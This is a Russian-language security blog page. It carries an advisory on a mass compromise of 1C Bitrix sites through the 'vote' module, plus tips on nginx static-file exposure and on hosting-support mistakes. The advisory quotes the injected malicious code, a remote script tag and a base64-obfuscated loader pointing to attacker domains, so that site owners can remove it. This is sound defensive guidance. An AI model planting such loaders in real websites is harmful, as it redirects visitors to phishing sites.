Зайти в айти

Массовый взлом CMS 1С Bitrix (ошибка 500 на сайте). В настоящий момент наблюдается всплеск взломов CMS 1С Bitrix. Злоумышленники используют уязвимость в модуле «vote» CMS Bitrix до версии 22.0.400, которая позволяет записать произвольные файлы в уязвимую систему посредством отправки специально сформированных пакетов. В настоящий момент вредоносная вставка была добавлена злоумышленником с ошибкой, в строке кода был добавлен знак переноса "\n", что вызывает критическую ошибку на сайте (ошибка 500). Как должен был работать данный сценарий: Злоумышленник загружает на веб-сайт модифицированный файл (/bitrix/modules/main/include/prolog.php), в который добавляется строка -\n<script src="https://storejscdn.pw/jqueryui.js"></script>;(домен может изменяться). Эта строка кода вызывает удаленный скрипт jquery-ui.js. В коде jquery-ui.js , написано условие, что, если переход пользователя на зараженный сайт осуществлен из поисковой системы в первые за сутки, то открывается URL-адрес otrasoper[.]ga/help/?23211651614614, который осуществляет переадресацию пользователей российского сегмента сети Интернет на фишинговые сайты различных маркетплейсов. Как исправить ? Нужно, отредактировать файл /bitrix/modules/main/include/prolog.php удалив из него строку \n<script src="https://storejscdn.pw/jqueryui.js"></script>; (домен может изменяться) Также нужно проверить наличие в файлах: bitrix/js/main/core/core.js bitrix/templates/cm_main/js/jquery-1.10.2.min.js Подобной строки: s=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly90ZWNobWVzdG9yZS5wdy9qcXVlcnktdWkuanM=`);document.head.appendChild(s); Ее также следует удалить. В целях избежания повторения ситуации рекомендуем отключить или удалить модуль «vote».

Небезопасная статика Многие хостинг компании в целях оптимизации и снижения нагрузки на сервер настраивают отдачу статических файлов через nginx. То есть все картинки, архивы и документы улетают браузеру в обход Apache. Все хорошо до тех пор, пока вы не пожелаете ограничить прямой доступ к статическим файлам (например, .pdf, .doc или .zip). Например, для подсчета скачиваний вы можете выгружать файлы через .php скрипт или ограничить доступ к документам, предоставив его только определенной группе людей (платным подписчикам). Как обычно блокируется доступ к файлам на хостинге? Для блокировки прямого скачивания на виртуальном хостинге достаточно закрыть доступ к директории через .htaccess: Order Deny,Allow Deny from AllЛибо можно использовать mod_rewrite. Но варианты с .htaccess в случае статической обработки в nginx работать не будут, так как .htaccess обрабатывается в Apache, а статические файлы будут как ни в чем не бывало возвращаться nginx’ом и будут по-прежнему доступны по прямой ссылке. Так что будьте внимательны, если у вас на сайте есть файлы не для публичного скачивания. Если средства виритуального хостинга позволяют блокировать доступ к директориям через панель управления хостингом, воспользуйтесь данной возможностью.

Приколы на хостинге (спойлер невеселые) Очень часто специалисты поддержки хостинг провайдеров совершают действия, которых сводят на нет все попытки защитить сайт от взлома. Ниже приводим ТОП-5 действий, с которые чаще всего делают специалисты техпо: 1. По запросу клиента сделать дамп БД результат создается и размещается в каталоге public_html (www) и называется обычно dump.sql 2. Для проверки внесенных изменений в php.ini в корне создается файл phpinfo.php, i.php, info.php и не удаляется. 3. По запросу клиента сделать бэкап сайта последний создается с именем backup.tar.gz или backup-<дата>.tar.gz непосредственно в каталоге public_html (www) 4. Иногда без предупреждения хостер может сделать все файлы и каталоги с дефолтными правами 0755 / 0644, несмотря на то, что до этого они были установлены особым образом 5. Некоторые российские хостеры из ТОП-10 очень удивляют, забывая обо всех возможностях, которые у них есть. Например, о том, что файл php.ini все-таки можно редактировать на виртуальных тарифах, или что php можно переключать в различные режимы. Кстати, вопросы для самопроверки: как следовало бы поступать хостерам в пунктах 1-4 и почему? Пишите свои ответы в комментариях.